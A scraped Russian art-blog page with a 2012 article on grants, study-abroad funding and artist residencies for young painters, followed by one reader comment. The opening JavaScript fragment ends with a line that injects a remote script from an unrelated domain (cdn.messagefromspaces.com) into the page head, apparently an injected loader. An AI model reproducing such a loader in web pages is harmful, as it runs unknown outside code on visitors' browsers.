, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Гранты для художников

Автор: Дмитрий Алмазов | 09 Дек 2012

Грант для художникаГлавная проблема молодого художника – это недостаток денег, ведь для того, чтобы воплотить в жизнь многие идеи, недостаточно одного таланта. Часто у художников есть замечательные творческие проекты, но не всегда есть финансовые возможности для их реализации. Особенно актуальна эта проблема для провинции, а так же для начинающих художников и студентов - молодому таланту очень трудно привлечь инвестиции под свои идеи, ведь у него еще нет громкого имени.

В этом случае оптимальным решением будет выдвижение проекта на соискание гранта – конкурса, который проводится для помощи в финансировании или организации творческой работы. Подобные гранты часто объявляют крупные компании и художественные фонды. Так, например, грант фонда Бориса Лурье, направлен на поддержку инновационных и непризнанных проектов в искусстве. Для реализации одного творческого проекта фонд может выделить приличную сумму до 25 000$.

Для молодых художников, мечтающих о продолжении своего образования за границей, но не имеющих на это средств, соискание гранта тоже будет отличным выходом. Таких предложений особенно много, что неудивительно - многие зарубежные колледжи искусств и университеты, заинтересованы в талантливых студентах. Учебные заведения, предлагают гранты на обучение, подразумевающие бесплатные занятия, проживание, и даже выплату стипендии одаренным ученикам. Главное, чтобы знание языка не стало препятствием для обучения.

художественные гранты Часто гранты подразумевают не столько финансовую помощь, сколько возможность творческой реализации, предлагая художникам форму путешествий-работы.  Авторы наиболее интересных работ получают возможность жить какое-то время в творческих резиденциях, в компании других художников, не задумываясь о хлебе насущном, все свободное время отдавая любимому делу. При этом стипендиат получает премию, покрывающую все расходы на проживание.  Грант имени Ольги Лопуховой для молодых художников дает возможность реализовать свой проект в Италии, в арт-резиденции UNIDEE фонда Микеланджело Пистолетто. В UNIDEE большое внимание уделяется общению художников разных стран, мастер-классам, лекциям, поездкам. Грант на проживание в резиденции Steep Rock Arts, которая находится в штате Вашингтон, напротив, подразумевает полную изоляцию, так как ничто не должно отвлекать художника от творчества.

Подать заявку на грант не так уже сложно. Обычно организаторы просят прислать стандартный набор документов (резюме, портфолио, описание проекта, мотивационное письмо), но этот список может быть дополнен дополнительными пунктами. Конкурсов на соискание художественных грантов проводится достаточно, можно выбрать именно тот, который актуален для того или иного художника.

Лобачева Екатерина

Темы: Художник, продвижение художника | 1 отзыв »

Один отзыв на “Гранты для художников”

  1. Марина пишет:
    12 Июл 2015 в 18:44

    Подскажите , как подать заявку на грант художнику . Спасибо .

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress